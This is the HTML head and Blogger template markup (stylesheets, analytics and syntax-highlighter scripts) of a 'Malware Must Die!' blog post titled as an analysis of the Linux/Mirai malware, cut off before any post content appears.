<!DOCTYPE html>
<html class='v2' dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr'>
<head>
<link href='https://www.blogger.com/static/v1/widgets/1529571102-css_bundle_v2.css' rel='stylesheet' type='text/css'/>
<meta content='IE=EmulateIE7' http-equiv='X-UA-Compatible'/>
<meta content='width=1100' name='viewport'/>
<meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>
<meta content='blogger' name='generator'/>
<link href='https://blog.malwaremustdie.org/favicon.ico' rel='icon' type='image/x-icon'/>
<link href='https://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html' rel='canonical'/>
<link rel="alternate" type="application/atom+xml" title="Malware Must Die! - Atom" href="https://blog.malwaremustdie.org/feeds/posts/default" />
<link rel="alternate" type="application/rss+xml" title="Malware Must Die! - RSS" href="https://blog.malwaremustdie.org/feeds/posts/default?alt=rss" />
<link rel="service.post" type="application/atom+xml" title="Malware Must Die! - Atom" href="https://www.blogger.com/feeds/8268358095554400245/posts/default" />

<link rel="alternate" type="application/atom+xml" title="Malware Must Die! - Atom" href="https://blog.malwaremustdie.org/feeds/962351771858487603/comments/default" />
<!--[if IE]><script type="text/javascript" src="https://www.blogger.com/static/v1/jsbin/2287435483-ieretrofit.js"></script>
<![endif]-->
<link href='https://lh3.googleusercontent.com/d1FGT8qEY4S6SABPZMtGv7j9kTEMwSOUW4mypPyP3Gom2jrfkyOteCFgva-RZhmoYnph77ISW3ZkFQ=w555-h130-no' rel='image_src'/>
<meta content='https://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html' property='og:url'/>
<meta content='MMD-0056-2016 - Linux/Mirai, how an old ELF malcode is recycled.. ' property='og:title'/>
<meta content='MalwareMustDie (MMD) is a whitehat workgroup to reduce malware, this blog advocates research on new malware threats &amp; Linux malware.' property='og:description'/>
<meta content='https://lh3.googleusercontent.com/d1FGT8qEY4S6SABPZMtGv7j9kTEMwSOUW4mypPyP3Gom2jrfkyOteCFgva-RZhmoYnph77ISW3ZkFQ=w1200-h630-p-k-no-nu' property='og:image'/>
<!--[if IE]> <script> (function() { var html5 = ("abbr,article,aside,audio,canvas,datalist,details," + "figure,footer,header,hgroup,mark,menu,meter,nav,output," + "progress,section,time,video").split(','); for (var i = 0; i < html5.length; i++) { document.createElement(html5[i]); } try { document.execCommand('BackgroundImageCache', false, true); } catch(e) {} })(); </script> <![endif]-->
<title>Malware Must Die!: MMD-0056-2016 - Linux/Mirai, how an old ELF malcode is recycled.. </title>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async='async' src='https://www.googletagmanager.com/gtag/js?id=UA-180537376-1'></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-180537376-1');
</script>
<style id='page-skin-1' type='text/css'><!--
/*
-----------------------------------------------
Blogger Template Style
Name:     Awesome Inc.
Designer: Tina Chen
----------------------------------------------- */
/* Variable definitions
====================
<Variable name="keycolor" description="Main Color" type="color" default="#ffffff"/>
<Group description="Page" selector="body">
<Variable name="body.font" description="Font" type="font"
default="normal normal 13px Arial, Tahoma, Helvetica, FreeSans, sans-serif"/>
<Variable name="body.background.color" description="Background Color" type="color" default="#000000"/>
<Variable name="body.text.color" description="Text Color" type="color" default="#ffffff"/>
</Group>
<Group description="Links" selector=".main-inner">
<Variable name="link.color" description="Link Color" type="color" default="#888888"/>
<Variable name="link.visited.color" description="Visited Color" type="color" default="#444444"/>
<Variable name="link.hover.color" description="Hover Color" type="color" default="#cccccc"/>
</Group>
<Group description="Blog Title" selector=".header h1">
<Variable name="header.font" description="Title Font" type="font"
default="normal bold 40px Arial, Tahoma, Helvetica, FreeSans, sans-serif"/>
<Variable name="header.text.color" description="Title Color" type="color" default="#ffffff" />
<Variable name="header.background.color" description="Header Background" type="color" default="transparent" />
</Group>
<Group description="Blog Description" selector=".header .description">
<Variable name="description.font" description="Font" type="font"
default="normal normal 14px Arial, Tahoma, Helvetica, FreeSans, sans-serif"/>
<Variable name="description.text.color" description="Text Color" type="color"
default="#ffffff" />
</Group>
<Group description="Tabs Text" selector=".tabs-inner .widget li a">
<Variable name="tabs.font" description="Font" type="font"
default="normal bold 14px Arial, Tahoma, Helvetica, FreeSans, sans-serif"/>
<Variable name="tabs.text.color" description="Text Color" type="color" default="#ffffff"/>
<Variable name="tabs.selected.text.color" description="Selected Color" type="color" default="#ffffff"/>
</Group>
<Group description="Tabs Background" selector=".tabs-outer .PageList">
<Variable name="tabs.background.color" description="Background Color" type="color" default="#141414"/>
<Variable name="tabs.selected.background.color" description="Selected Color" type="color" default="#444444"/>
<Variable name="tabs.border.color" description="Border Color" type="color" default="#222222"/>
</Group>
<Group description="Date Header" selector=".main-inner .widget h2.date-header, .main-inner .widget h2.date-header span">
<Variable name="date.font" description="Font" type="font"
default="normal normal 14px Arial, Tahoma, Helvetica, FreeSans, sans-serif"/>
<Variable name="date.text.color" description="Text Color" type="color" default="#666666"/>
<Variable name="date.border.color" description="Border Color" type="color" default="#222222"/>
</Group>
<Group description="Post Title" selector="h3.post-title, h4, h3.post-title a">
<Variable name="post.title.font" description="Font" type="font"
default="normal bold 22px Arial, Tahoma, Helvetica, FreeSans, sans-serif"/>
<Variable name="post.title.text.color" description="Text Color" type="color" default="#ffffff"/>
</Group>
<Group description="Post Background" selector=".post">
<Variable name="post.background.color" description="Background Color" type="color" default="#141414" />
<Variable name="post.border.color" description="Border Color" type="color" default="#222222" />
<Variable name="post.border.bevel.color" description="Bevel Color" type="color" default="#222222"/>
</Group>
<Group description="Gadget Title" selector="h2">
<Variable name="widget.title.font" description="Font" type="font"
default="normal bold 14px Arial, Tahoma, Helvetica, FreeSans, sans-serif"/>
<Variable name="widget.title.text.color" description="Text Color" type="color" default="#ffffff"/>
</Group>
<Group description="Gadget Text" selector=".sidebar .widget">
<Variable name="widget.font" description="Font" type="font"
default="normal normal 14px Arial, Tahoma, Helvetica, FreeSans, sans-serif"/>
<Variable name="widget.text.color" description="Text Color" type="color" default="#ffffff"/>
<Variable name="widget.alternate.text.color" description="Alternate Color" type="color" default="#666666"/>
</Group>
<Group description="Gadget Links" selector=".sidebar .widget">
<Variable name="widget.link.color" description="Link Color" type="color" default="#888888"/>
<Variable name="widget.link.visited.color" description="Visited Color" type="color" default="#444444"/>
<Variable name="widget.link.hover.color" description="Hover Color" type="color" default="#cccccc"/>
</Group>
<Group description="Gadget Background" selector=".sidebar .widget">
<Variable name="widget.background.color" description="Background Color" type="color" default="#141414"/>
<Variable name="widget.border.color" description="Border Color" type="color" default="#222222"/>
<Variable name="widget.border.bevel.color" description="Bevel Color" type="color" default="#000000"/>
</Group>
<Group description="Sidebar Background" selector=".column-left-inner .column-right-inner">
<Variable name="widget.outer.background.color" description="Background Color" type="color" default="transparent" />
</Group>
<Group description="Images" selector=".main-inner">
<Variable name="image.background.color" description="Background Color" type="color" default="transparent"/>
<Variable name="image.border.color" description="Border Color" type="color" default="transparent"/>
</Group>
<Group description="Feed" selector=".blog-feeds">
<Variable name="feed.text.color" description="Text Color" type="color" default="#ffffff"/>
</Group>
<Group description="Feed Links" selector=".blog-feeds">
<Variable name="feed.link.color" description="Link Color" type="color" default="#888888"/>
<Variable name="feed.link.visited.color" description="Visited Color" type="color" default="#444444"/>
<Variable name="feed.link.hover.color" description="Hover Color" type="color" default="#cccccc"/>
</Group>
<Group description="Pager" selector=".blog-pager">
<Variable name="pager.background.color" description="Background Color" type="color" default="#141414" />
</Group>
<Group description="Footer" selector=".footer-outer">
<Variable name="footer.background.color" description="Background Color" type="color" default="#141414" />
<Variable name="footer.text.color" description="Text Color" type="color" default="#ffffff" />
</Group>
<Variable name="title.shadow.spread" description="Title Shadow" type="length" default="-1px" min="-1px" max="100px"/>
<Variable name="body.background" description="Body Background" type="background"
color="#000000"
default="$(color) none repeat scroll top left"/>
<Variable name="body.background.gradient.cap" description="Body Gradient Cap" type="url"
default="none"/>
<Variable name="body.background.size" description="Body Background Size" type="string" default="auto"/>
<Variable name="tabs.background.gradient" description="Tabs Background Gradient" type="url"
default="none"/>
<Variable name="header.background.gradient" description="Header Background Gradient" type="url" default="none" />
<Variable name="header.padding.top" description="Header Top Padding" type="length" default="22px" min="0" max="100px"/>
<Variable name="header.margin.top" description="Header Top Margin" type="length" default="0" min="0" max="100px"/>
<Variable name="header.margin.bottom" description="Header Bottom Margin" type="length" default="0" min="0" max="100px"/>
<Variable name="widget.padding.top" description="Widget Padding Top" type="length" default="8px" min="0" max="20px"/>
<Variable name="widget.padding.side" description="Widget Padding Side" type="length" default="15px" min="0" max="100px"/>
<Variable name="widget.outer.margin.top" description="Widget Top Margin" type="length" default="0" min="0" max="100px"/>
<Variable name="widget.outer.background.gradient" description="Gradient" type="url" default="none" />
<Variable name="widget.border.radius" description="Gadget Border Radius" type="length" default="0" min="0" max="100px"/>
<Variable name="outer.shadow.spread" description="Outer Shadow Size" type="length" default="0" min="0" max="100px"/>
<Variable name="date.header.border.radius.top" description="Date Header Border Radius Top" type="length" default="0" min="0" max="100px"/>
<Variable name="date.header.position" description="Date Header Position" type="length" default="15px" min="0" max="100px"/>
<Variable name="date.space" description="Date Space" type="length" default="30px" min="0" max="100px"/>
<Variable name="date.position" description="Date Float" type="string" default="static" />
<Variable name="date.padding.bottom" description="Date Padding Bottom" type="length" default="0" min="0" max="100px"/>
<Variable name="date.border.size" description="Date Border Size" type="length" default="0" min="0" max="10px"/>
<Variable name="date.background" description="Date Background" type="background" color="transparent"
default="$(color) none no-repeat scroll top left" />
<Variable name="date.first.border.radius.top" description="Date First top radius" type="length" default="0" min="0" max="100px"/>
<Variable name="date.last.space.bottom" description="Date Last Space Bottom" type="length"
default="20px" min="0" max="100px"/>
<Variable name="date.last.border.radius.bottom" description="Date Last bottom radius" type="length" default="0" min="0" max="100px"/>
<Variable name="post.first.padding.top" description="First Post Padding Top" type="length" default="0" min="0" max="100px"/>
<Variable name="image.shadow.spread" description="Image Shadow Size" type="length" default="0" min="0" max="100px"/>
<Variable name="image.border.radius" description="Image Border Radius" type="length" default="0" min="0" max="100px"/>
<Variable name="separator.outdent" description="Separator Outdent" type="length" default="15px" min="0" max="100px"/>
<Variable name="title.separator.border.size" description="Widget Title Border Size" type="length" default="1px" min="0" max="10px"/>
<Variable name="list.separator.border.size" description="List Separator Border Size" type="length" default="1px" min="0" max="10px"/>
<Variable name="shadow.spread" description="Shadow Size" type="length" default="0" min="0" max="100px"/>
<Variable name="startSide" description="Side where text starts in blog language" type="automatic" default="left"/>
<Variable name="endSide" description="Side where text ends in blog language" type="automatic" default="right"/>
<Variable name="date.side" description="Side where date header is placed" type="string" default="right"/>
<Variable name="pager.border.radius.top" description="Pager Border Top Radius" type="length" default="0" min="0" max="100px"/>
<Variable name="pager.space.top" description="Pager Top Space" type="length" default="1em" min="0" max="20em"/>
<Variable name="footer.background.gradient" description="Background Gradient" type="url" default="none" />
<Variable name="mobile.background.size" description="Mobile Background Size" type="string"
default="auto"/>
<Variable name="mobile.background.overlay" description="Mobile Background Overlay" type="string"
default="transparent none repeat scroll top left"/>
<Variable name="mobile.button.color" description="Mobile Button Color" type="color" default="#ffffff" />
*/
/* Content
----------------------------------------------- */
body {
font: normal normal 13px Arial, Tahoma, Helvetica, FreeSans, sans-serif;
color: #ffffff;
background: #000000 none no-repeat scroll center center;
}
html body .content-outer {
min-width: 0;
max-width: 100%;
width: 100%;
}
a:link {
text-decoration: none;
color: #888888;
}
a:visited {
text-decoration: none;
color: #444444;
}
a:hover {
text-decoration: underline;
color: #cccccc;
}
.body-fauxcolumn-outer .cap-top {
position: absolute;
z-index: 1;
height: 276px;
width: 100%;
background: transparent none repeat-x scroll top left;
_background-image: none;
}
/* Columns
----------------------------------------------- */
.content-inner {
padding: 0;
}
.header-inner .section {
margin: 0 16px;
}
.tabs-inner .section {
margin: 0 16px;
}
.main-inner {
padding-top: 30px;
}
.main-inner .column-center-inner,
.main-inner .column-left-inner,
.main-inner .column-right-inner {
padding: 0 5px;
}
*+html body .main-inner .column-center-inner {
margin-top: -30px;
}
#layout .main-inner .column-center-inner {
margin-top: 0;
}
/* Header
----------------------------------------------- */
.header-outer {
margin: 0 0 0 0;
background: transparent none repeat scroll 0 0;
}
.Header h1 {
font: normal bold 40px Arial, Tahoma, Helvetica, FreeSans, sans-serif;
color: #ffffff;
text-shadow: 0 0 -1px #000000;
}
.Header h1 a {
color: #ffffff;
}
.Header .description {
font: normal normal 14px Arial, Tahoma, Helvetica, FreeSans, sans-serif;
color: #ffffff;
}
.header-inner .Header .titlewrapper,
.header-inner .Header .descriptionwrapper {
padding-left: 0;
padding-right: 0;
margin-bottom: 0;
}
.header-inner .Header .titlewrapper {
padding-top: 22px;
}
/* Tabs
----------------------------------------------- */
.tabs-outer {
overflow: hidden;
position: relative;
background: #141414 none repeat scroll 0 0;
}
#layout .tabs-outer {
overflow: visible;
}
.tabs-cap-top, .tabs-cap-bottom {
position: absolute;
width: 100%;
border-top: 1px solid #222222;
}
.tabs-cap-bottom {
bottom: 0;
}
.tabs-inner .widget li a {
display: inline-block;
margin: 0;
padding: .6em 1.5em;
font: normal bold 14px Arial, Tahoma, Helvetica, FreeSans, sans-serif;
color: #ffffff;
border-top: 1px solid #222222;
border-bottom: 1px solid #222222;
border-left: 1px solid #222222;
height: 16px;
line-height: 16px;
}
.tabs-inner .widget li:last-child a {
border-right: 1px solid #222222;
}
.tabs-inner .widget li.selected a, .tabs-inner .widget li a:hover {
background: #444444 none repeat-x scroll 0 -100px;
color: #ffffff;
}
/* Headings
----------------------------------------------- */
h2 {
font: normal bold 14px Arial, Tahoma, Helvetica, FreeSans, sans-serif;
color: #ffffff;
}
/* Widgets
----------------------------------------------- */
.main-inner .section {
margin: 0 27px;
padding: 0;
}
.main-inner .column-left-outer,
.main-inner .column-right-outer {
margin-top: 0;
}
#layout .main-inner .column-left-outer,
#layout .main-inner .column-right-outer {
margin-top: 0;
}
.main-inner .column-left-inner,
.main-inner .column-right-inner {
background: transparent none repeat 0 0;
-moz-box-shadow: 0 0 0 rgba(0, 0, 0, .2);
-webkit-box-shadow: 0 0 0 rgba(0, 0, 0, .2);
-goog-ms-box-shadow: 0 0 0 rgba(0, 0, 0, .2);
box-shadow: 0 0 0 rgba(0, 0, 0, .2);
-moz-border-radius: 0;
-webkit-border-radius: 0;
-goog-ms-border-radius: 0;
border-radius: 0;
}
#layout .main-inner .column-left-inner,
#layout .main-inner .column-right-inner {
margin-top: 0;
}
.sidebar .widget {
font: normal normal 14px Arial, Tahoma, Helvetica, FreeSans, sans-serif;
color: #ffffff;
}
.sidebar .widget a:link {
color: #888888;
}
.sidebar .widget a:visited {
color: #444444;
}
.sidebar .widget a:hover {
color: #cccccc;
}
.sidebar .widget h2 {
text-shadow: 0 0 -1px #000000;
}
.main-inner .widget {
background-color: #141414;
border: 1px solid #222222;
padding: 0 15px 15px;
margin: 20px -16px;
-moz-box-shadow: 0 0 0 rgba(0, 0, 0, .2);
-webkit-box-shadow: 0 0 0 rgba(0, 0, 0, .2);
-goog-ms-box-shadow: 0 0 0 rgba(0, 0, 0, .2);
box-shadow: 0 0 0 rgba(0, 0, 0, .2);
-moz-border-radius: 0;
-webkit-border-radius: 0;
-goog-ms-border-radius: 0;
border-radius: 0;
}
.main-inner .widget h2 {
margin: 0 -15px;
padding: .6em 15px .5em;
border-bottom: 1px solid #000000;
}
.footer-inner .widget h2 {
padding: 0 0 .4em;
border-bottom: 1px solid #000000;
}
.main-inner .widget h2 + div, .footer-inner .widget h2 + div {
border-top: 1px solid #222222;
padding-top: 8px;
}
.main-inner .widget .widget-content {
margin: 0 -15px;
padding: 7px 15px 0;
}
.main-inner .widget ul, .main-inner .widget #ArchiveList ul.flat {
margin: -8px -15px 0;
padding: 0;
list-style: none;
}
.main-inner .widget #ArchiveList {
margin: -8px 0 0;
}
.main-inner .widget ul li, .main-inner .widget #ArchiveList ul.flat li {
padding: .5em 15px;
text-indent: 0;
color: #666666;
border-top: 1px solid #222222;
border-bottom: 1px solid #000000;
}
.main-inner .widget #ArchiveList ul li {
padding-top: .25em;
padding-bottom: .25em;
}
.main-inner .widget ul li:first-child, .main-inner .widget #ArchiveList ul.flat li:first-child {
border-top: none;
}
.main-inner .widget ul li:last-child, .main-inner .widget #ArchiveList ul.flat li:last-child {
border-bottom: none;
}
.post-body {
position: relative;
}
.main-inner .widget .post-body ul {
padding: 0 2.5em;
margin: .5em 0;
list-style: disc;
}
.main-inner .widget .post-body ul li {
padding: 0.25em 0;
margin-bottom: .25em;
color: #ffffff;
border: none;
}
.footer-inner .widget ul {
padding: 0;
list-style: none;
}
.widget .zippy {
color: #666666;
}
/* Posts
----------------------------------------------- */
body .main-inner .Blog {
padding: 0;
margin-bottom: 1em;
background-color: transparent;
border: none;
-moz-box-shadow: 0 0 0 rgba(0, 0, 0, 0);
-webkit-box-shadow: 0 0 0 rgba(0, 0, 0, 0);
-goog-ms-box-shadow: 0 0 0 rgba(0, 0, 0, 0);
box-shadow: 0 0 0 rgba(0, 0, 0, 0);
}
.main-inner .section:last-child .Blog:last-child {
padding: 0;
margin-bottom: 1em;
}
.main-inner .widget h2.date-header {
margin: 0 -15px 1px;
padding: 0 0 0 0;
font: normal normal 14px Arial, Tahoma, Helvetica, FreeSans, sans-serif;
color: #666666;
background: transparent none no-repeat scroll top left;
border-top: 0 solid #222222;
border-bottom: 1px solid #000000;
-moz-border-radius-topleft: 0;
-moz-border-radius-topright: 0;
-webkit-border-top-left-radius: 0;
-webkit-border-top-right-radius: 0;
border-top-left-radius: 0;
border-top-right-radius: 0;
position: static;
bottom: 100%;
right: 15px;
text-shadow: 0 0 -1px #000000;
}
.main-inner .widget h2.date-header span {
font: normal normal 14px Arial, Tahoma, Helvetica, FreeSans, sans-serif;
display: block;
padding: .5em 15px;
border-left: 0 solid #222222;
border-right: 0 solid #222222;
}
.date-outer {
position: relative;
margin: 30px 0 20px;
padding: 0 15px;
background-color: #141414;
border: 1px solid #222222;
-moz-box-shadow: 0 0 0 rgba(0, 0, 0, .2);
-webkit-box-shadow: 0 0 0 rgba(0, 0, 0, .2);
-goog-ms-box-shadow: 0 0 0 rgba(0, 0, 0, .2);
box-shadow: 0 0 0 rgba(0, 0, 0, .2);
-moz-border-radius: 0;
-webkit-border-radius: 0;
-goog-ms-border-radius: 0;
border-radius: 0;
}
.date-outer:first-child {
margin-top: 0;
}
.date-outer:last-child {
margin-bottom: 20px;
-moz-border-radius-bottomleft: 0;
-moz-border-radius-bottomright: 0;
-webkit-border-bottom-left-radius: 0;
-webkit-border-bottom-right-radius: 0;
-goog-ms-border-bottom-left-radius: 0;
-goog-ms-border-bottom-right-radius: 0;
border-bottom-left-radius: 0;
border-bottom-right-radius: 0;
}
.date-posts {
margin: 0 -15px;
padding: 0 15px;
clear: both;
}
.post-outer, .inline-ad {
border-top: 1px solid #222222;
margin: 0 -15px;
padding: 15px 15px;
}
.post-outer {
padding-bottom: 10px;
}
.post-outer:first-child {
padding-top: 0;
border-top: none;
}
.post-outer:last-child, .inline-ad:last-child {
border-bottom: none;
}
.post-body {
position: relative;
}
.post-body img {
padding: 8px;
background: #222222;
border: 1px solid transparent;
-moz-box-shadow: 0 0 0 rgba(0, 0, 0, .2);
-webkit-box-shadow: 0 0 0 rgba(0, 0, 0, .2);
box-shadow: 0 0 0 rgba(0, 0, 0, .2);
-moz-border-radius: 0;
-webkit-border-radius: 0;
border-radius: 0;
}
h3.post-title, h4 {
font: normal bold 22px Arial, Tahoma, Helvetica, FreeSans, sans-serif;
color: #ffffff;
}
h3.post-title a {
font: normal bold 22px Arial, Tahoma, Helvetica, FreeSans, sans-serif;
color: #ffffff;
}
h3.post-title a:hover {
color: #cccccc;
text-decoration: underline;
}
.post-header {
margin: 0 0 1em;
}
.post-body {
line-height: 1.4;
}
.post-outer h2 {
color: #ffffff;
}
.post-footer {
margin: 1.5em 0 0;
}
#blog-pager {
padding: 15px;
font-size: 120%;
background-color: #141414;
border: 1px solid #222222;
-moz-box-shadow: 0 0 0 rgba(0, 0, 0, .2);
-webkit-box-shadow: 0 0 0 rgba(0, 0, 0, .2);
-goog-ms-box-shadow: 0 0 0 rgba(0, 0, 0, .2);
box-shadow: 0 0 0 rgba(0, 0, 0, .2);
-moz-border-radius: 0;
-webkit-border-radius: 0;
-goog-ms-border-radius: 0;
border-radius: 0;
-moz-border-radius-topleft: 0;
-moz-border-radius-topright: 0;
-webkit-border-top-left-radius: 0;
-webkit-border-top-right-radius: 0;
-goog-ms-border-top-left-radius: 0;
-goog-ms-border-top-right-radius: 0;
border-top-left-radius: 0;
border-top-right-radius-topright: 0;
margin-top: 1em;
}
.blog-feeds, .post-feeds {
margin: 1em 0;
text-align: center;
color: #ffffff;
}
.blog-feeds a, .post-feeds a {
color: #888888;
}
.blog-feeds a:visited, .post-feeds a:visited {
color: #444444;
}
.blog-feeds a:hover, .post-feeds a:hover {
color: #cccccc;
}
.post-outer .comments {
margin-top: 2em;
}
/* Comments
----------------------------------------------- */
.comments .comments-content .icon.blog-author {
background-repeat: no-repeat;
background-image: url();
}
.comments .comments-content .loadmore a {
border-top: 1px solid #222222;
border-bottom: 1px solid #222222;
}
.comments .continue {
border-top: 2px solid #222222;
}
/* Footer
----------------------------------------------- */
.footer-outer {
margin: -0 0 -1px;
padding: 0 0 0;
color: #ffffff;
overflow: hidden;
}
.footer-fauxborder-left {
border-top: 1px solid #222222;
background: #141414 none repeat scroll 0 0;
-moz-box-shadow: 0 0 0 rgba(0, 0, 0, .2);
-webkit-box-shadow: 0 0 0 rgba(0, 0, 0, .2);
-goog-ms-box-shadow: 0 0 0 rgba(0, 0, 0, .2);
box-shadow: 0 0 0 rgba(0, 0, 0, .2);
margin: 0 -0;
}
/* Mobile
----------------------------------------------- */
body.mobile {
background-size: auto;
}
.mobile .body-fauxcolumn-outer {
background: transparent none repeat scroll top left;
}
*+html body.mobile .main-inner .column-center-inner {
margin-top: 0;
}
.mobile .main-inner .widget {
padding: 0 0 15px;
}
.mobile .main-inner .widget h2 + div,
.mobile .footer-inner .widget h2 + div {
border-top: none;
padding-top: 0;
}
.mobile .footer-inner .widget h2 {
padding: 0.5em 0;
border-bottom: none;
}
.mobile .main-inner .widget .widget-content {
margin: 0;
padding: 7px 0 0;
}
.mobile .main-inner .widget ul,
.mobile .main-inner .widget #ArchiveList ul.flat {
margin: 0 -15px 0;
}
.mobile .main-inner .widget h2.date-header {
right: 0;
}
.mobile .date-header span {
padding: 0.4em 0;
}
.mobile .date-outer:first-child {
margin-bottom: 0;
border: 1px solid #222222;
-moz-border-radius-topleft: 0;
-moz-border-radius-topright: 0;
-webkit-border-top-left-radius: 0;
-webkit-border-top-right-radius: 0;
-goog-ms-border-top-left-radius: 0;
-goog-ms-border-top-right-radius: 0;
border-top-left-radius: 0;
border-top-right-radius: 0;
}
.mobile .date-outer {
border-color: #222222;
border-width: 0 1px 1px;
}
.mobile .date-outer:last-child {
margin-bottom: 0;
}
.mobile .main-inner {
padding: 0;
}
.mobile .header-inner .section {
margin: 0;
}
.mobile .post-outer, .mobile .inline-ad {
padding: 5px 0;
}
.mobile .tabs-inner .section {
margin: 0 10px;
}
.mobile .main-inner .widget h2 {
margin: 0;
padding: 0;
}
.mobile .main-inner .widget h2.date-header span {
padding: 0;
}
.mobile .main-inner .widget .widget-content {
margin: 0;
padding: 7px 0 0;
}
.mobile #blog-pager {
border: 1px solid transparent;
background: #141414 none repeat scroll 0 0;
}
.mobile .main-inner .column-left-inner,
.mobile .main-inner .column-right-inner {
background: transparent none repeat 0 0;
-moz-box-shadow: none;
-webkit-box-shadow: none;
-goog-ms-box-shadow: none;
box-shadow: none;
}
.mobile .date-posts {
margin: 0;
padding: 0;
}
.mobile .footer-fauxborder-left {
margin: 0;
border-top: inherit;
}
.mobile .main-inner .section:last-child .Blog:last-child {
margin-bottom: 0;
}
.mobile-index-contents {
color: #ffffff;
}
.mobile .mobile-link-button {
background: #888888 none repeat scroll 0 0;
}
.mobile-link-button a:link, .mobile-link-button a:visited {
color: #ffffff;
}
.mobile .tabs-inner .PageList .widget-content {
background: transparent;
border-top: 1px solid;
border-color: #222222;
color: #ffffff;
}
.mobile .tabs-inner .PageList .widget-content .pagelist-arrow {
border-left: 1px solid #222222;
}

--></style>
<style id='template-skin-1' type='text/css'><!--
body {
min-width: 960px;
}
.content-outer, .content-fauxcolumn-outer, .region-inner {
min-width: 960px;
max-width: 960px;
_width: 960px;
}
.main-inner .columns {
padding-left: 0px;
padding-right: 310px;
}
.main-inner .fauxcolumn-center-outer {
left: 0px;
right: 310px;
/* IE6 does not respect left and right together */
_width: expression(this.parentNode.offsetWidth -
parseInt("0px") -
parseInt("310px") + 'px');
}
.main-inner .fauxcolumn-left-outer {
width: 0px;
}
.main-inner .fauxcolumn-right-outer {
width: 310px;
}
.main-inner .column-left-outer {
width: 0px;
right: 100%;
margin-left: -0px;
}
.main-inner .column-right-outer {
width: 310px;
margin-right: -310px;
}
#layout {
min-width: 0;
}
#layout .content-outer {
min-width: 0;
width: 800px;
}
#layout .region-inner {
min-width: 0;
width: auto;
}
--></style>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async='async' src='https://www.googletagmanager.com/gtag/js?id=G-GGYD63MC07'></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-GGYD63MC07');
</script>
<link href='https://unixfreaxjp.github.io/styles/shCore.css' rel='stylesheet' type='text/css'/>
<link href='https://unixfreaxjp.github.io/styles/shThemeRDark.css' rel='stylesheet' type='text/css'/>
<script src='https://unixfreaxjp.github.io/scripts/shCore.js' type='text/javascript'></script>
<script src='https://unixfreaxjp.github.io/scripts/shBrushCpp.js' type='text/javascript'></script>
<script src='https://unixfreaxjp.github.io/scripts/shBrushCss.js' type='text/javascript'></script>
<script src='https://unixfreaxjp.github.io/scripts/shBrushJava.js' type='text/javascript'></script>
<script src='https://unixfreaxjp.github.io/scripts/shBrushJScript.js' type='text/javascript'></script>
<script src='https://unixfreaxjp.github.io/scripts/shBrushPhp.js' type='text/javascript'></script>
<script src='https://unixfreaxjp.github.io/scripts/shBrushPython.js' type='text/javascript'></script>
<script src='https://unixfreaxjp.github.io/scripts/shBrushRuby.js' type='text/javascript'></script>
<script src='https://unixfreaxjp.github.io/scripts/shBrushSql.js' type='text/javascript'></script>
<script src='https://unixfreaxjp.github.io/scripts/shBrushVb.js' type='text/javascript'></script>
<script src='https://unixfreaxjp.github.io/scripts/shBrushXml.js' type='text/javascript'></script>
<script src='https://unixfreaxjp.github.io/scripts/shBrushPerl.js' type='text/javascript'></script>
<script src='https://unixfreaxjp.github.io/scripts/shBrushPlain.js' type='text/javascript'></script>
<script src='https://unixfreaxjp.github.io/scripts/shBrushBash.js' type='text/javascript'></script>
<script src='https://unixfreaxjp.github.io/scripts/shBrushAsm.js' type='text/javascript'></script>
<script language='javascript'> 
// SyntaxHighlighter.config.bloggerMode = true;
SyntaxHighlighter.all();
</script>
<link href='https://www.blogger.com/dyn-css/authorization.css?targetBlogID=8268358095554400245&amp;zx=6d699317-e04a-4073-a8ed-9df5a54c7ce9' media='none' onload='if(media!=&#39;all&#39;)media=&#39;all&#39;' rel='stylesheet'/><noscript><link href='https://www.blogger.com/dyn-css/authorization.css?targetBlogID=8268358095554400245&amp;zx=6d699317-e04a-4073-a8ed-9df5a54c7ce9' rel='stylesheet'/></noscript>
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>

<script type="text/javascript" language="javascript">
  // Supply ads personalization default for EEA readers
  // See https://www.blogger.com/go/adspersonalization
  adsbygoogle = window.adsbygoogle || [];
  if (typeof adsbygoogle.requestNonPersonalizedAds === 'undefined') {
    adsbygoogle.requestNonPersonalizedAds = 1;
  }
</script>


</head>
<body class='loading'>
<div class='navbar section' id='navbar'><div class='widget Navbar' data-version='1' id='Navbar1'><script type="text/javascript">
    function setAttributeOnload(object, attribute, val) {
      if(window.addEventListener) {
        window.addEventListener('load',
          function(){ object[attribute] = val; }, false);
      } else {
        window.attachEvent('onload', function(){ object[attribute] = val; });
      }
    }
  </script>
<div id="navbar-iframe-container"></div>
<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
<script type="text/javascript">
      gapi.load("gapi.iframes:gapi.iframes.style.bubble", function() {
        if (gapi.iframes && gapi.iframes.getContext) {
          gapi.iframes.getContext().openChild({
              url: 'https://www.blogger.com/navbar.g?targetBlogID\x3d8268358095554400245\x26blogName\x3dMalware+Must+Die!\x26publishMode\x3dPUBLISH_MODE_HOSTED\x26navbarType\x3dLIGHT\x26layoutType\x3dLAYOUTS\x26searchRoot\x3dhttps://blog.malwaremustdie.org/search\x26blogLocale\x3den\x26v\x3d2\x26homepageUrl\x3dhttps://blog.malwaremustdie.org/\x26targetPostID\x3d962351771858487603\x26blogPostOrPageUrl\x3dhttps://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html\x26vt\x3d3790362919588885090',
              where: document.getElementById("navbar-iframe-container"),
              id: "navbar-iframe"
          });
        }
      });
    </script><script type="text/javascript">
(function() {
var script = document.createElement('script');
script.type = 'text/javascript';
script.src = '//pagead2.googlesyndication.com/pagead/js/google_top_exp.js';
var head = document.getElementsByTagName('head')[0];
if (head) {
head.appendChild(script);
}})();
</script>
</div></div>
<div class='body-fauxcolumns'>
<div class='fauxcolumn-outer body-fauxcolumn-outer'>
